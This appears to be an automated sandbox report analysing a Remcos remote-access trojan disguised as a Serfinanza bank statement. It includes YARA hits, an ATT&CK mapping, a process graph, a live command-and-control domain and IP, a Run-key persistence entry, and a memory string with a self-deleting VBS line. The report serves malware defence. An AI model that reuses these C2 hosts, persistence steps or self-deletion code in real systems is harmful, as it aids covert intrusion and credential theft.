          Source: PxxoServicesTrialNet1.exe, 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.706118629.0000000003969000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.781443613.00000000049AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.771805512.000000000559E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.759339292.0000000003C85000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 4480, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 7144, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 5772, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6880, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 6788, type: MEMORY
          Source: Yara matchFile source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPE
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: cmd.exe7_2_00402B8A
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: cmd.exe25_2_00402B8A

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScripting11Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsNative API1Windows Service1Access Token Manipulation1Deobfuscate/Decode Files or Information1Input Capture121Account Discovery1Remote Desktop ProtocolInput Capture121Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsCommand and Scripting Interpreter1Registry Run Keys / Startup Folder1Windows Service1Scripting11Credentials In Files2System Service Discovery1SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsService Execution2Logon Script (Mac)Process Injection222Obfuscated Files or Information2NTDSFile and Directory Discovery3Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder1Software Packing1LSA SecretsSystem Information Discovery43SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol11Jamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncSecurity Software Discovery321Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion161Proc FilesystemVirtualization/Sandbox Evasion161Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowProcess Discovery3Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection222Network SniffingApplication Window Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Owner/User Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 399743 Sample: EXTRACTOSERFINANZA989543704... Startdate: 29/04/2021 Architecture: WINDOWS Score: 100 81 Multi AV Scanner detection for domain / URL 2->81 83 Found malware configuration 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 8 other signatures 2->87 11 EXTRACTOSERFINANZA989543704031499704092798964.exe 3 2->11         started        14 PxxoServicesTrialNet1.exe 2->14         started        17 PxxoServicesTrialNet1.exe 2->17         started        process3 file4 97 Contains functionality to steal Chrome passwords or cookies 11->97 99 Contains functionality to capture and log keystrokes 11->99 101 Contains functionality to inject code into remote processes 11->101 103 Contains functionality to steal Firefox passwords or cookies 11->103 19 EXTRACTOSERFINANZA989543704031499704092798964.exe 4 5 11->19         started        22 cmd.exe 1 11->22         started        24 WerFault.exe 24 9 11->24         started        75 C:\Users\...\PxxoServicesTrialNet1.exe.log, ASCII 14->75 dropped 105 Hides threads from debuggers 14->105 107 Injects a PE file into a foreign processes 14->107 27 cmd.exe 14->27         started        29 cmd.exe 17->29         started        31 PxxoServicesTrialNet1.exe 17->31         started        33 PxxoServicesTrialNet1.exe 17->33         started        35 WerFault.exe 17->35         started        signatures5 process6 dnsIp7 71 C:\Users\user\...\PxxoServicesTrialNet1.exe, PE32 19->71 dropped 73 PxxoServicesTrialN...exe:Zone.Identifier, ASCII 19->73 dropped 37 wscript.exe 1 19->37         started        39 conhost.exe 22->39         started        41 timeout.exe 1 22->41         started        77 192.168.2.1 unknown unknown 24->77 43 conhost.exe 27->43         started        45 timeout.exe 27->45         started        47 conhost.exe 29->47         started        49 timeout.exe 29->49         started        file8 process9 process10 51 cmd.exe 1 37->51         started        process11 53 PxxoServicesTrialNet1.exe 3 51->53         started        56 conhost.exe 51->56         started        signatures12 89 Multi AV Scanner detection for dropped file 53->89 91 Machine Learning detection for dropped file 53->91 93 Contains functionality to steal Chrome passwords or cookies 53->93 95 5 other signatures 53->95 58 PxxoServicesTrialNet1.exe 53->58         started        61 cmd.exe 53->61         started        63 PxxoServicesTrialNet1.exe 53->63         started        65 WerFault.exe 53->65         started        process13 dnsIp14 79 databasepropersonombrecomercialideasearchwords.services 190.255.84.57, 3521 COLOMBIATELECOMUNICACIONESSAESPCO Colombia 58->79 67 conhost.exe 61->67         started        69 timeout.exe 61->69         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          EXTRACTOSERFINANZA989543704031499704092798964.exe11%ReversingLabsWin32.Trojan.Barys
          EXTRACTOSERFINANZA989543704031499704092798964.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe11%ReversingLabsWin32.Trojan.Barys

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack100%AviraBDS/Backdoor.GenDownload File
          7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
          15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack100%AviraBDS/Backdoor.GenDownload File
          16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack100%AviraBDS/Backdoor.GenDownload File
          33.2.PxxoServicesTrialNet1.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
          15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack100%AviraBDS/Backdoor.GenDownload File
          25.2.PxxoServicesTrialNet1.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
          1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack100%AviraBDS/Backdoor.GenDownload File
          1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack100%AviraBDS/Backdoor.GenDownload File
          16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack100%AviraBDS/Backdoor.GenDownload File
          24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack100%AviraBDS/Backdoor.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          databasepropersonombrecomercialideasearchwords.services13%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          databasepropersonombrecomercialideasearchwords.services13%VirustotalBrowse
          databasepropersonombrecomercialideasearchwords.services0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          databasepropersonombrecomercialideasearchwords.services
          		190.255.84.57
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          databasepropersonombrecomercialideasearchwords.servicestrue
          • 13%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
            		high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
              		high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.743843983.0000000005530000.00000004.00000001.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpfalse
                                      		high

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      190.255.84.57
                                      		databasepropersonombrecomercialideasearchwords.servicesColombia
                                      		3816COLOMBIATELECOMUNICACIONESSAESPCOtrue

                                      Private

                                      IP
                                      192.168.2.1

                                      General Information

                                      Joe Sandbox Version:32.0.0 Black Diamond
                                      Analysis ID:399743
                                      Start date:29.04.2021
                                      Start time:06:02:03
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 15m 11s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:40
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@45/17@5/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 30.8% (good quality ratio 18.5%)
                                      • Quality average: 44.4%
                                      • Quality standard deviation: 42%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 100
                                      • Number of non-executed functions: 261
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Excluded IPs from analysis (whitelisted): 52.113.196.254, 13.107.3.254, 13.107.246.254, 104.42.151.234, 92.122.145.220, 104.43.139.144, 20.50.102.62, 92.122.213.249, 92.122.213.247, 52.155.217.156, 20.54.26.129
                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      06:03:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MservicesOrg2 "C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe"
                                      06:03:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MservicesOrg2 "C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe"
                                      06:03:12API Interceptor3x Sleep call for process: WerFault.exe modified
                                      06:03:20API Interceptor801x Sleep call for process: PxxoServicesTrialNet1.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      databasepropersonombrecomercialideasearchwords.services32657046_pdf.exeGet hashmaliciousBrowse
                                      • 190.255.84.57
                                      6565426875_p.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      4831902122_p.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      8992538102_p.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      9604_pdf.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      Factura Serfinanza089768553548090985869814228.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      EXTRACTOSERFINANZA894978636268808051252452885.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      EXTRACTOSERFINANZA149952705997730013733597462.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      Factura Serfinanza015523916818153570120365653.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      Factura Serfinanza053176011500426549564067806.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      Factura Serfinanza049678941875683878450087827.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      51121122_pdf.exeGet hashmaliciousBrowse
                                      • 190.255.93.130
                                      3677_pdf.exeGet hashmaliciousBrowse
                                      • 190.255.93.130
                                      Factura Serfinanza095207277561125631669632022.exeGet hashmaliciousBrowse
                                      • 190.255.93.130
                                      Factura Serfinanza075728689544681589138450755.exeGet hashmaliciousBrowse
                                      • 190.255.93.130
                                      Factura Serfinanza034712604259512713576096038.exeGet hashmaliciousBrowse
                                      • 190.255.93.130
                                      ADJUNTOEXTRACTO590878174787097120989222355748.exeGet hashmaliciousBrowse
                                      • 186.169.74.198
                                      Factura Serfinanza022880209777477966487010096.exeGet hashmaliciousBrowse
                                      • 186.169.74.198
                                      SERFINANZAEXTRACTO944199837077212444587235899.exeGet hashmaliciousBrowse
                                      • 186.169.74.198
                                      SERFINANZAEXTRACTO728296481601298694807375214.exeGet hashmaliciousBrowse
                                      • 186.169.74.198

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      COLOMBIATELECOMUNICACIONESSAESPCO6565426875_p.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      4831902122_p.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      8992538102_p.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      9604_pdf.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      Factura Serfinanza089768553548090985869814228.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      EXTRACTOSERFINANZA894978636268808051252452885.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      EXTRACTOSERFINANZA149952705997730013733597462.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      Factura Serfinanza015523916818153570120365653.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      Factura Serfinanza053176011500426549564067806.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      Factura Serfinanza049678941875683878450087827.exeGet hashmaliciousBrowse
                                      • 186.169.38.241
                                      rIbyGX66OpGet hashmaliciousBrowse
                                      • 167.13.97.181
                                      Factura Serfinanza034712604259512713576096038.exeGet hashmaliciousBrowse
                                      • 190.255.93.130
                                      aa6281eb-a31c-4e8b-a2c6-c5c03fdcbe57.exeGet hashmaliciousBrowse
                                      • 200.21.51.38
                                      ADJUNTOEXTRACTO590878174787097120989222355748.exeGet hashmaliciousBrowse
                                      • 186.169.74.198
                                      Factura Serfinanza022880209777477966487010096.exeGet hashmaliciousBrowse
                                      • 186.169.74.198
                                      SERFINANZAEXTRACTO944199837077212444587235899.exeGet hashmaliciousBrowse
                                      • 186.169.74.198
                                      SERFINANZAEXTRACTO728296481601298694807375214.exeGet hashmaliciousBrowse
                                      • 186.169.74.198
                                      SERFINANZAEXTRACTO283816558547438357773985414.exeGet hashmaliciousBrowse
                                      • 186.169.74.198
                                      Factura Serfinanza010714008071991847569194350.exeGet hashmaliciousBrowse
                                      • 186.169.74.198
                                      EXTRACTOSERFINANZA596054271198721911813685868.exeGet hashmaliciousBrowse
                                      • 186.169.74.198

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_MVLWCKDAQD5FGBB2_49c7f4ecea5ecda709bac2c317171852536834d_20f0d725_03d4bb9b\Report.wer
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):15176
                                      Entropy (8bit):3.793511206475218
                                      Encrypted:false
                                      SSDEEP:192:VqFNmcmHBUZMXyaKA6K+da0/u7sBS274ItWq:sFNqBUZMXyaya0/u7sBX4ItWq
                                      MD5:4CBDB4F7DD0D4C450F7E98FEA9A6C619
                                      SHA1:57D5B2242B34A721C24EF9EFE404D9A52FA2708A
                                      SHA-256:678A1E5282D41D34861E4C1652AA47DD2D5896FCBC5855FD07E8101BB786E2E9
                                      SHA-512:3393EE9DBE06BC64413CEDEB1ACCCDE69941AF305CE909A1ED08D007C7286F5A40E16D4921A38CC8BE39C0C7E42C83A5FA73829491A9FE4A7C93376326F6CF55
                                      Malicious:false
                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.1.4.2.5.8.0.9.8.8.9.1.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.1.4.2.5.9.0.4.8.8.8.7.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.9.c.e.1.5.d.-.8.a.0.1.-.4.3.6.4.-.8.a.2.2.-.d.8.d.1.6.9.8.4.1.c.7.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.c.6.6.1.5.5.-.d.e.9.4.-.4.f.5.b.-.8.7.e.1.-.7.1.e.4.e.5.1.6.1.d.f.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.X.T.R.A.C.T.O.S.E.R.F.I.N.A.N.Z.A.9.8.9.5.4.3.7.0.4.0.3.1.4.9.9.7.0.4.0.9.2.7.9.8.9.6.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.A.B.M.I.G...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.e.0.-.0.0.0.1.-.0.0.1.b.-.9.5.6.a.-.a.6.8.4.a.c.3.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.8.f.e.4.d.d.b.1.2.e.2.2.3.9.6.d.b.2.4.b.9.7.7.f.f.e.c.1.5.d.5.0.0.0.0.0.9.0.4.!.0.0.0.0.
                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_PxxoServicesTria_f7f5b899daf81aa7bcebffddfe468a1dc8d73cbd_3a3bac9c_18c921d7\Report.wer
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):14940
                                      Entropy (8bit):3.7683499846652353
